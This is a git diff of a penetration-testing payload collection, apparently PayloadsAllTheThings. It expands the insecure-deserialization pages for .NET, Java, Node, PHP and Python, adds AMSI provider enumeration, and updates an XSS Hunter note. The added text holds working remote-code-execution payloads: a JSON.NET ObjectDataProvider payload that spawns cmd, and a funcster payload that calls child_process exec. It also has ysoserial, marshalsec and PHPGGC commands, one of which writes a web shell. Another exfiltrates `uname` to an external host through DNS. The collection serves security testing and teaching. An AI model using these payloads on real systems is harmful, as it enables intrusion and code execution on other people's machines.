diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md index 976a9f4..0fef027 100644 --- a/Insecure Deserialization/DotNET.md +++ b/Insecure Deserialization/DotNET.md @@ -3,7 +3,13 @@ ## Summary * [Detection](#detection) -* [Exploit](#exploit) +* [Tools](#tools) +* [Formatters](#formatters) + * [XmlSerializer](#) + * [DataContractSerializer](#) + * [JSON.NET](#) + * [BinaryFormatter](#) +* [POP Gadgets](#pop-gadgets) * [References](#references) @@ -15,7 +21,7 @@ Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=` -## Exploit +## Tools * [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net) ```ps1 @@ -25,24 +31,120 @@ $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ``` -### JSON.NET +## Formatters + +![NETNativeFormatters.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Insecure%20Deserialization/Images/NETNativeFormatters.png?raw=true) +.NET Native Formatters from [pwntester/attacking-net-serialization](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=15) + +### XmlSerializer + +* In C# source code, look for `XmlSerializer(typeof());`. +* The attacker must control the **type** of the XmlSerializer. +* Payload output: **XML** + +```xml +.\ysoserial.exe -g ObjectDataProvider -f XmlSerializer -c "calc.exe" + + + + + + Parse + + + cmd/c calc.exe]]> + + + + + + +``` + + +### DataContractSerializer + +> The DataContractSerializer deserializes in a loosely coupled way. It never reads common language runtime (CLR) type and assembly names from the incoming data. The security model for the XmlSerializer is similar to that of the DataContractSerializer, and differs mostly in details. For example, the XmlIncludeAttribute attribute is used for type inclusion instead of the KnownTypeAttribute attribute. + +* In C# source code, look for `DataContractSerializer(typeof())`. +* Payload output: **XML** +* Data **Type** must be user-controlled to be exploitable + + +### NetDataContractSerializer + +* In C# source code, look for `NetDataContractSerializer().ReadObject()`. +* Payload output: **XML** ```ps1 -./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +.\ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c "calc.exe" -o base64 -t +``` + + +### JSON.NET + +* Payload output: **JSON** + +```ps1 +.\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc.exe" -t +{ + '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', + 'MethodName':'Start', + 'MethodParameters':{ + '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', + '$values':['cmd', '/c calc.exe'] + }, + 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} +} ``` ### BinaryFormatter -> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they’re processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure. +> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure. + +* In C# source code, look for `System.Runtime.Serialization.Binary.BinaryFormatter`. +* Exploitation requires `[Serializable]` or `ISerializable` interface. +* Payload output: **Binary** ```ps1 -./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t ``` +## POP Gadgets + +These gadgets must have the following properties: +* Serializable +* Public/settable variables +* Magic "functions": Get/Set, OnSerialisation, Constructors/Destructors + +You must carefully select your **gadgets** for a targeted **formatter**. + + +List of popular gadgets used in common payloads. +* **ObjectDataProvider** from `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll` + * Use `MethodParameters` to set arbitrary parameters + * Use `MethodName` to call an arbitrary function +* **ExpandedWrapper** + * Specify the `object types` of the objects that are encapsulated + ```cs + ExpandedWrapper myExpWrap = new ExpandedWrapper(); + ``` + + ## References -* [Attacking .NET deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q) +* [Attacking .NET Serialization - Alvaro - October 20, 2017](https://speakerdeck.com/pwntester/attacking-net-serialization?slide=11) +* [Attacking .NET Deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q) +* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - Slides](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) +* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf) +* [Friday the 13th: JSON Attacks - Alvaro Muñoz (@pwntester) Oleksandr Mirosh - DEF CON 25 Conference](https://www.youtube.com/watch?v=ZBfBYoK_Wr0) +* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - Slides](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_Slides.pdf) +* [ARE YOU MY TYPE? Breaking .NET sandboxes through Serialization - James Forshaw - White Paper](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf) * [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits) -* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) \ No newline at end of file +* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) +* [Bypassing .NET Serialization Binders - Markus Wulftange - June 28, 2022](https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html) +* [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net) - hacktricks](https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net) +* [Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237 - Nov 2, 2021 - Shubham Shah](https://blog.assetnote.io/2021/11/02/sitecore-rce/) +* [Finding a New DataContractSerializer RCE Gadget Chain - November 7, 2019 - dugisec](https://muffsec.com/blog/finding-a-new-datacontractserializer-rce-gadget-chain/) \ No newline at end of file diff --git a/Insecure Deserialization/Images/NETNativeFormatters.png b/Insecure Deserialization/Images/NETNativeFormatters.png new file mode 100755 index 0000000..ed5a5c2 Binary files /dev/null and b/Insecure Deserialization/Images/NETNativeFormatters.png differ diff --git a/Insecure Deserialization/Java.md b/Insecure Deserialization/Java.md index a40b19a..c13b999 100644 --- a/Insecure Deserialization/Java.md +++ b/Insecure Deserialization/Java.md @@ -9,17 +9,20 @@ - Content-type = "application/x-java-serialized-object" - `"H4sIAAAAAAAAAJ"` in gzip(base64) -## Exploit +## Tools + +### Ysoserial [frohoff/ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ```java java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin -java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin +java -jar ysoserial.jar Groovy1 'ping 127.0.0.1' > payload.bin java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | base64 ``` +**List of payloads included in ysoserial:** ```ps1 Payload Authors Dependencies ------- ------- ------------ @@ -59,7 +62,7 @@ Vaadin1 @kai_ullrich vaadin-server:7.7.14, Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 ``` -## Burp extensions using ysoserial +### Burp extensions using ysoserial - [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller) - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner) @@ -67,24 +70,26 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s - [SuperSerial](https://github.com/DirectDefense/SuperSerial) - [SuperSerial-Active](https://github.com/DirectDefense/SuperSerial-Active) -## Other tools +### Alternative Tooling -- [JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) -- [JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool -- [ysoserial-modified](https://github.com/pimps/ysoserial-modified) -- [gadgetprobe](https://labs.bishopfox.com/gadgetprobe) -- [marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution +- [pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) +- [joaomatosf/JexBoss](https://github.com/joaomatosf/jexboss) - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool +- [pimps/ysoserial-modified](https://github.com/pimps/ysoserial-modified) +- [NickstaDB/SerialBrute](https://github.com/NickstaDB/SerialBrute) - Java serialization brute force attack tool +- [NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper) - A tool to dump Java serialization streams in a more human readable form +- [bishopfox/gadgetprobe](https://labs.bishopfox.com/gadgetprobe) +- [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Turning your data into code execution ```java -$ java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec. [-a] [-v] [-t] [ []] -$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 +$ java -cp marshalsec.jar marshalsec. [-a] [-v] [-t] [ []] +$ java -cp marshalsec.jar marshalsec.JsonIO Groovy "cmd" "/c" "calc" +$ java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://localhost:8000\#exploit.JNDIExploit 1389 - where - -a - generates/tests all payloads for that marshaller - -t - runs in test mode, unmarshalling the generated payloads after generating them. - -v - verbose mode, e.g. also shows the generated payload in test mode. - gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. - arguments - Gadget specific arguments +-a - generates/tests all payloads for that marshaller +-t - runs in test mode, unmarshalling the generated payloads after generating them. +-v - verbose mode, e.g. also shows the generated payload in test mode. +gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller. +arguments - Gadget specific arguments ``` Payload generators for the following marshallers are included:
@@ -105,6 +110,13 @@ Payload generators for the following marshallers are included:
| XStream | **JDK only RCEs** | YAMLBeans | third party RCE +## Gadgets + +Require: +* `java.io.Serializable` + + + ## References diff --git a/Insecure Deserialization/Node.md b/Insecure Deserialization/Node.md index b25f3b7..2f92304 100644 --- a/Insecure Deserialization/Node.md +++ b/Insecure Deserialization/Node.md @@ -3,10 +3,19 @@ ## Summary * [Exploit](#exploit) + * [node-serialize](#node-serialize) + * [funcster](#funcster) * [References](#references) ## Exploit +* In Node source code, look for: + * `node-serialize` + * `serialize-to-js` + * `funcster` + +### node-serialize + > An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). 1. Generate a serialized payload @@ -26,6 +35,12 @@ ``` 3. Send the payload +### funcster + +```js +{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}} +``` + ## References diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index e30689a..30522be 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -15,8 +15,8 @@ Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.c * [General concept](#general-concept) * [Authentication bypass](#authentication-bypass) * [Finding and using gadgets](#finding-and-using-gadgets) -* [Real world examples](#real-world-examples) * [PHP Phar Deserialization](#php-phar-deserialization) +* [Real world examples](#real-world-examples) * [References](#references) ## General concept @@ -111,7 +111,7 @@ Payload: O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;} ``` -We can do an array to like this: +We can do an array like this: ```php a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} @@ -121,7 +121,14 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;} Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. -[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: +* In PHP source code, look for `unserialize()` function. +* Interesting [Magic Methods](https://www.php.net/manual/en/language.oop5.magic.php) such as `__construct()`, `__destruct()`, `__call()`, `__callStatic()`, `__get()`, `__set()`, `__isset()`, `__unset()`, `__sleep()`, `__wakeup()`, `__serialize()`, `__unserialize()`, `__toString()`, `__invoke()`, `__set_state()`, `__clone()`, and `__debugInfo()`: + * `__construct()`: PHP class constructor, is automatically called upon object creation + * `__destruct()`: PHP class destructor, is automatically called when references to the object are removed from memory + * `__toString()`: PHP call-back that gets executed if the object is treated like a string + * `__wakeup()` PHP call-back that gets executed upon deserialization + +[ambionics/phpggc](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: - Laravel - Symfony @@ -133,6 +140,8 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. ```powershell phpggc monolog/rce1 'phpinfo();' -s +phpggc monolog/rce1 assert 'phpinfo()' +phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini ``` diff --git a/Insecure Deserialization/Python.md b/Insecure Deserialization/Python.md index 563db1c..656def5 100644 --- a/Insecure Deserialization/Python.md +++ b/Insecure Deserialization/Python.md @@ -1,5 +1,11 @@ # Python Deserialization +* In Python source code, look for: + * `cPickle.loads` + * `pickle.loads` + * `_pickle.loads` + * `jsonpickle.decode` + ## Pickle The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object. diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 23b8391..1e5cc2a 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -18,10 +18,20 @@ Check the following sub-sections, located in other files : | Python Pickle | 80 04 95 | gASV | | PHP Serialized | 4F 3A | Tz | +## POP Gadgets -## LABS +> A POP (Property Oriented Programming) gadget is a piece of code implemented by an application's class, that can be called during the deserialization process. -* [Insecure Deserialization 10 labs](https://portswigger.net/web-security/all-labs#insecure-deserialization) +POP gadgets characteristics: +* Can be serialized +* Has public/accessible properties +* Implements specific vulnerable methods +* Has access to other "callable" classes + +## Labs + +* [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization) +* [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab) ## References diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index 813206c..40573d3 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md +++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -2,6 +2,7 @@ ## Summary +* [List AMSI Providers](#list-amsi-providers) * [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi) * [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse) * [Dont use net webclient](#Dont-use-net-webclient) @@ -19,9 +20,31 @@ * [Adam Chesters Patch](#Adam-Chester-Patch) * [AMSI.fail](#amsifail) +## List AMSI Providers + +* List providers with : `Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\'` +* Find software from CLSID + ```ps1 + Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}' + Name Property + ---- -------- + Hosts (default) : Scanned Hosting Applications + InprocServer32 (default) : "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpOav.dll" + ``` + ## Which Endpoint Protection is Using AMSI -* https://github.com/subat0mik/whoamsi/wiki/Which-Endpoint-Protection-is-Using-AMSI%3F +Small extract from [subat0mik/whoamsi](https://github.com/subat0mik/whoamsi) - An effort to track security vendors' use of Microsoft's Antimalware Scan Interface: + +| Vendor/Product | AMSI | Date | Reference | +| -------- | -------- | -------- | -------- | +| Avast | Y | 03/20/2016 | https://forum.avast.com/index.php?topic=184491.msg1300884#msg1300884 | +| AVG | Y | 03/08/2016 | https://support.avg.com/answers?id=906b00000008oUTAAY | +| BitDefender Consumer | Y | 09/20/2016 | https://forum.bitdefender.com/index.php?/topic/72455-antimalware-scan-service/ | +| BitDefender Enterprise | Y | 05/25/2021 | https://twitter.com/Bitdefender_Ent/status/1397187195669295111?s=20 | +| Kaspersky Anti Targeted Attack Platform | Y | 10/10/2018 | https://help.kaspersky.com/KIS/2019/en-US/119653.htm | +| Symantec Advanced Threat Protection | Y | 07/15/2020 | https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/symantec-security-software/endpoint-security-and-management/endpoint-protection/all/release-notes/Whats-new-for-Symantec-Endpoint-Protection-14_3-.html | +| Microsoft Defender for Endpoint | Y | 06/09/2015 | https://www.microsoft.com/security/blog/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/ # Patching amsi.dll AmsiScanBuffer by rasta-mouse diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7b788a1..da1e166 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -497,7 +497,7 @@ document.getElementById('btn').onclick = function(e){ ### XSS Hunter -Available at [https://xsshunter.com/app](https://xsshunter.com/app) +XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https://xsshunter.com/app). You can set up an alternative version from [mandatoryprogrammer/xsshunter-express](https://github.com/mandatoryprogrammer/xsshunter-express) > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.